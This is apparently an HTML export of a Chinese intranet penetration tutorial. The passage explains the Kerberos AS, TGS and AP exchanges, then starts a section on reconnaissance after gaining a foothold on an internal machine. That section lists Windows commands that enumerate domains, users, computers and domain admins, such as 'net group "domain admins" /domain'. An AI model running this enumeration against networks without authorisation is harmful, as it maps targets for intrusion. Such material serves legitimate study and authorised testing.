                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        <span lang="EN-US">sesionkey-as </span>和<span lang="EN-US"> Timestamp</span>)<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span style="letter-spacing:.05pt;">在 </span><span lang="EN-US">KDC<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">中存储了域中所有用户的密码 </span><span lang="EN-US">hash</span><span style="letter-spacing:.05pt;">,当 </span><span lang="EN-US">AS </span>接受到<span lang="EN-US"> Client<span style="letter-spacing:-.05pt;"> </span></span><span style="letter-spacing:-.05pt;">的请求后会根据 </span><span lang="EN-US" style="letter-spacing:-.1pt;">KDC </span><span style="letter-spacing:-.65pt;">中存储的密码来解密,解密成功并且验证信息。验证成功后返回给 </span><span lang="EN-US">Client<span style="letter-spacing:1.25pt;"> </span></span><span style="letter-spacing:1.25pt;">由</span><span lang="EN-US">Client </span>密码<span lang="EN-US"> hash </span><span style="letter-spacing:.05pt;">加密的 </span><span lang="EN-US">sessionkey-as<span style="letter-spacing:.25pt;"> </span></span><span style="letter-spacing:.25pt;">和 </span><span lang="EN-US">TGT</span>(<span style="letter-spacing:.15pt;">由 </span><span lang="EN-US">KBRTGT<span style="letter-spacing:1.45pt;"> </span>HASH<span style="letter-spacing:.1pt;"> </span></span><span style="letter-spacing:.1pt;">加密的 </span><span lang="EN-US">sessionkey-as<span style="letter-spacing:.2pt;"> </span></span><span style="letter-spacing:.2pt;">和 </span><span lang="EN-US">Timestamp<span style="letter-spacing:.1pt;"> </span></span><span style="letter-spacing:.1pt;">等信息</span><span style="letter-spacing:-5.3pt;">)</span>。<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection5;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:7.2pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="555" height="294" src="https://www.2k8.org/content/uploadfile/202203/17/37803ade.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.2pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:7.0pt;">&nbsp;</span>
                </p>
                <h5 style="margin-bottom:.0001pt;margin-left:24.0pt;margin-right:0cm;margin-top:2.25pt;punctuation-wrap:simple;tab-stops:24.05pt;">
                        <span lang="EN-US" style="letter-spacing:-.1pt;"><span>(2)<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US">The Ticket Granting Service(TGS)<span style="letter-spacing:-.15pt;"> </span>Exchange</span>
                </h5>
                <h6 style="punctuation-wrap:simple;">
                        <span lang="EN-US">KBR_TGS_REQ:</span>
                </h6>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        <span lang="EN-US">Client-&gt;TGS </span>发送<span lang="EN-US"> Authenticator2(sessionkey-as </span>加密<span lang="EN-US"> timestamp)</span>和票据<span lang="EN-US"> TGT(KBRTGT HASH</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        加密的<span lang="EN-US"> sessionkey-as </span>和<span lang="EN-US"> timestamp)</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span lang="EN-US">Client<span style="letter-spacing:-.05pt;"> </span></span><span style="letter-spacing:-.05pt;">接收到了加密的</span><span lang="EN-US">sessionkey-as<span style="letter-spacing:.35pt;"> </span></span><span style="letter-spacing:.35pt;">和</span><span lang="EN-US">TGT<span style="letter-spacing:-.55pt;"> </span></span><span style="letter-spacing:-.55pt;">后,用自身的密码解密得到</span><span lang="EN-US">sessionkey-as</span>,<span lang="EN-US"> TGT<span style="letter-spacing:.05pt;"> </span></span><span style="letter-spacing:.05pt;">是 </span><span lang="EN-US">KDC<span style="letter-spacing:-.1pt;"> </span></span><span style="letter-spacing:-.1pt;">密码加密的,</span><span lang="EN-US">Client<span style="letter-spacing:-.1pt;"> </span></span><span style="letter-spacing:-.1pt;">无法解密。这时 </span><span lang="EN-US">Client<span style="letter-spacing:.05pt;"> </span></span><span style="letter-spacing:.05pt;">再用 </span><span lang="EN-US">sessionkey-as </span>加密<span lang="EN-US"> timestamp </span><span style="letter-spacing:.2pt;">和 </span><span lang="EN-US">TGT </span>一起发送给<span lang="EN-US"> KDC<span style="letter-spacing:.15pt;"> </span></span><span style="letter-spacing:.15pt;">中的 </span><span lang="EN-US">TGS</span>(<span lang="EN-US">Ticket Granting Server</span>)<span style="letter-spacing:-.15pt;">票据授权服务器换取能够访问<span lang="EN-US">Server </span>的票据。<span lang="EN-US"></span></span>
                </p>
                <h5 style="margin-top:6.3pt;punctuation-wrap:simple;text-indent:0cm;">
                        <span lang="EN-US">KBR_TGS-REP:</span>
                </h5>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:10.65pt;margin-top:6.6pt;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        <span lang="EN-US">TGS-&gt;Client</span><span style="letter-spacing:-.25pt;">:发送密文</span><span style="letter-spacing:-.15pt;">(</span><span style="letter-spacing:-.2pt;">由 </span><span lang="EN-US">sessionkey-as<span style="letter-spacing:-.2pt;"> </span></span><span style="letter-spacing:-.2pt;">加密的 </span><span lang="EN-US">sessionkey-tgs</span>)<span style="letter-spacing:-.15pt;">和票据 </span><span lang="EN-US" style="letter-spacing:-.2pt;">ST</span><span style="letter-spacing:-.2pt;">(由 </span><span lang="EN-US">server<span style="letter-spacing:-.25pt;"> </span></span><span style="letter-spacing:-.25pt;">密码 </span><span lang="EN-US">hash<span style="letter-spacing:-.2pt;"> </span></span><span style="letter-spacing:-.2pt;">加密的 </span><span lang="EN-US">sessionkey-tgs</span>)<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span lang="EN-US">TGS<span style="letter-spacing:.1pt;"> </span></span><span style="letter-spacing:.1pt;">收到 </span><span lang="EN-US">Client </span>发送过来的<span lang="EN-US"> TGT<span style="letter-spacing:.25pt;"> </span></span><span style="letter-spacing:.25pt;">和 </span><span lang="EN-US">Sessionkey-as<span style="letter-spacing:.1pt;"> </span></span><span style="letter-spacing:.1pt;">加密的 </span><span lang="EN-US">TimeStamp<span style="letter-spacing:-.05pt;"> </span></span><span style="letter-spacing:-.05pt;">之后,首先会检</span><span style="letter-spacing:.2pt;">查自身是否存在</span><span lang="EN-US">Client<span style="letter-spacing:-.35pt;"> </span></span><span style="letter-spacing:-.35pt;">所请求的服务。如果服务存在,则用 </span><span lang="EN-US">KRBTGT<span style="letter-spacing:-.1pt;"> </span></span><span style="letter-spacing:-.1pt;">密码解密 </span><span lang="EN-US">TGT</span><span style="letter-spacing:-.3pt;">。一般情</span><span style="letter-spacing:1.1pt;">况下</span><span lang="EN-US">TGS<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">会检查 </span><span lang="EN-US">TGT<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">中的时间戳查看 </span><span lang="EN-US">TGT<span style="letter-spacing:-.45pt;"> </span></span><span style="letter-spacing:-.45pt;">是否过期,且原始地址是否和 </span><span lang="EN-US">TGT<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">中保存的地址相同。验证成功之后将用 </span><span lang="EN-US">sessionkey-as<span style="letter-spacing:-.2pt;"> </span></span><span style="letter-spacing:-.2pt;">加密的 </span><span lang="EN-US">sessionkey-tgs<span style="letter-spacing:-.1pt;"> </span></span><span style="letter-spacing:-.1pt;">和 </span><span lang="EN-US">Server<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">密码 </span><span lang="EN-US">HASH<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">加密的<span lang="EN-US">Sessionkey-tgs</span></span><span lang="EN-US" style="letter-spacing:.45pt;"> </span><span style="letter-spacing:.45pt;">发送给</span><span lang="EN-US">Client</span>。<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection6;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:7.6pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="544" height="289" src="https://www.2k8.org/content/uploadfile/202203/17/a7f35b1f.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.2pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:9.0pt;">&nbsp;</span>
                </p>
                <h5 style="margin-bottom:.0001pt;margin-left:24.0pt;margin-right:0cm;margin-top:2.25pt;punctuation-wrap:simple;tab-stops:24.05pt;">
                        <span lang="EN-US" style="letter-spacing:-.1pt;"><span>(3)<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US">The Client/Server Authentication<span style="letter-spacing:-.05pt;"> </span>Exchange</span>
                </h5>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.3pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:8.5pt;">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:12.0pt;">KBR_AP_REQ:</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:6.55pt;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        <span lang="EN-US">Client-&gt;Server </span>发送<span lang="EN-US"> Authenticator3(sessionkey-tgs </span>加密<span lang="EN-US"> timestamp)</span>和票据<span lang="EN-US"> ST(Server </span>密码<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        <span lang="EN-US">hash </span>加密的<span lang="EN-US"> sessionkey-tgs)</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.75pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span lang="EN-US">Client<span style="letter-spacing:.4pt;"> </span></span><span style="letter-spacing:.4pt;">收到</span><span lang="EN-US">sessionkey-as<span style="letter-spacing:.3pt;"> </span></span><span style="letter-spacing:.3pt;">加密的</span><span lang="EN-US">sessionkey-tgs<span style="letter-spacing:.7pt;"> </span></span><span style="letter-spacing:.7pt;">和</span><span lang="EN-US">Server<span style="letter-spacing:.45pt;"> </span></span><span style="letter-spacing:.45pt;">密码</span><span lang="EN-US">hash<span style="letter-spacing:.3pt;"> </span></span><span style="letter-spacing:.3pt;">加密的</span><span lang="EN-US">sessionkey- t<span style="letter-spacing:.05pt;">g</span>s </span><span style="letter-spacing:.75pt;">之后用</span><span lang="EN-US">se<span style="letter-spacing:-.15pt;">s</span>si<span style="letter-spacing:-.1pt;">on</span><span style="letter-spacing:-.05pt;">k</span>ey-<span style="letter-spacing:-.05pt;">a</span>s </span><span style="letter-spacing:.55pt;">解密得到</span><span lang="EN-US">s<span style="letter-spacing:-.15pt;">e</span>s<span style="letter-spacing:-.1pt;">s</span>i<span style="letter-spacing:-.1pt;">on</span><span style="letter-spacing:-.05pt;">k</span>e<span style="letter-spacing:-.05pt;">y</span>-t<span style="letter-spacing:-.1pt;">g</span><span style="letter-spacing:.05pt;">s</span></span><span style="letter-spacing:-1.35pt;">,然后把 </span><span lang="EN-US">se<span style="letter-spacing:-.15pt;">s</span>s<span style="letter-spacing:.05pt;">i</span><span style="letter-spacing:-.1pt;">on</span><span style="letter-spacing:-.05pt;">k</span>e<span style="letter-spacing:-.05pt;">y</span>-<span style="letter-spacing:-.15pt;">t</span><span style="letter-spacing:.05pt;">g</span>s </span><span style="letter-spacing:.7pt;">加密的</span><span lang="EN-US">t<span style="letter-spacing:-.1pt;">i</span><span style="letter-spacing:-.05pt;">mes</span><span style="letter-spacing:-.15pt;">t</span>a<span style="letter-spacing:-.15pt;">m</span>p</span><span style="letter-spacing:-.15pt;">和 </span><span lang="EN-US">ST<span style="letter-spacing:-.2pt;"> </span></span><span style="letter-spacing:-.2pt;">一起发送给 </span><span lang="EN-US">Server</span>。<span lang="EN-US"></span>
                </p>
                <h5 style="margin-top:6.35pt;punctuation-wrap:simple;text-indent:0cm;">
                        <span lang="EN-US">KBR_AP_REP:</span>
                </h5>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:6.5pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">Server-&gt;Client<span style="letter-spacing:-.2pt;"> </span>:</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">Server </span>通过自己的密码解密<span lang="EN-US"> ST </span>, 得到<span lang="EN-US"> sessionkey-tgs </span>, 再用<span lang="EN-US"> sessionkey-tgs </span>解密<span lang="EN-US"> </span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">Authenticator3 </span>得到<span lang="EN-US"> timestamp</span>,验证正确返回验证成功。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1028" style="position:absolute;margin-left:91.25pt;margin-top:7.05pt;width:407pt;height:217pt;z-index:251660288;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:217.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1060" type="#_x0000_t75" style="width:408pt;height:216.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image013.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="183" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="545" height="292" src="https://www.2k8.org/content/uploadfile/202203/17/6b8a80da.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:3.0pt;"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:3.0pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection7;">
                <h1 style="line-height:32.4pt;punctuation-wrap:simple;">
                        <a name="3、域内信息收集"></a><span lang="EN-US">3</span>、域内信息收集<span lang="EN-US"></span>
                </h1>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.55pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:16.5pt;">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:172%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.8pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span style="font-size:12.0pt;line-height:172%;letter-spacing:-.2pt;">在拿到一台内网机器的时候,首先要确定是不是在域内。可通过以下命令来</span><span style="font-size:12.0pt;line-height:172%;letter-spacing:-.4pt;">判断机器是否在域内,若命令能成功执行并返回结果则当前机器在域内,否则不</span><span style="font-size:12.0pt;line-height:172%;">在域内。<span lang="EN-US"></span></span>
                </p>
                <h3 style="margin-top:9.85pt;punctuation-wrap:simple;tab-stops:34.1pt;">
                        <a name="3.1 判断是否是域环境"></a><span lang="EN-US"><span>3.1<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span>判断是否是域环境<span lang="EN-US"></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">net view /domain </span>查询域列表<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1029" style="position:absolute;margin-left:90pt;margin-top:7.35pt;width:413pt;height:78pt;z-index:251661312;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:78.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1061" type="#_x0000_t75" style="width:413.5pt;height:78pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image015.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="553" height="107" src="https://www.2k8.org/content/uploadfile/202203/17/3f4f60c1.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:3.5pt;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:6.35pt;margin-left:6.0pt;margin-right:8.55pt;margin-top:6.55pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">net time /domain<span style="letter-spacing:-.35pt;"> </span></span><span style="letter-spacing:-.35pt;">从域控查询时间,若当前用户是域用户会从域控返回当前时间,亦用来判</span><span style="letter-spacing:-.25pt;">断主域,主域一般用做时间服务器<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="554" height="87" src="https://www.2k8.org/content/uploadfile/202203/17/6894e493.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:6.5pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1030" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:24.05pt;width:416pt;height:137pt;z-index:251662336;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:137.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1062" type="#_x0000_t75" style="width:416.5pt;height:137pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image019.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="557" height="185" src="https://www.2k8.org/content/uploadfile/202203/17/6a923768.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">net localgroup administrators </span>本机管理员【通常含有域用户】<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:.2pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">net user /domain </span>查询域用户(当前域)<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection8;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="552" height="175" src="https://www.2k8.org/content/uploadfile/202203/17/9728dd8a.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:4.9pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">net group /domain </span>查询域工作组<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1031" style="position:absolute;margin-left:90pt;margin-top:7.15pt;width:414pt;height:219pt;z-index:251663360;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:219.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1063" type="#_x0000_t75" style="width:414pt;height:218.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image023.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="555" height="295" src="https://www.2k8.org/content/uploadfile/202203/17/16b4a279.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:3.0pt;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:5.15pt;margin-left:6.0pt;margin-right:0cm;margin-top:6.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">net group "domain computers" /domain </span>查看加入域的所有计算机名<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="551" height="172" src="https://www.2k8.org/content/uploadfile/202203/17/c899624d.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:6.15pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">net group "domain admins" /domain </span>查询域管理员用户组和域管用户<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection9;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="557" height="186" src="https://www.2k8.org/content/uploadfile/202203/17/bf9465ff.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.3pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:8.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.1pt;margin-left:6.0pt;margin-right:0cm;margin-top:2.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">net localgroup administrators /domain </span>查看域管理员<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="553" height="228" src="https://www.2k8.org/content/uploadfile/202203/17/e54e6bdb.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:.35pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1032" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:20.1pt;width:416pt;height:132pt;z-index:251664384;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
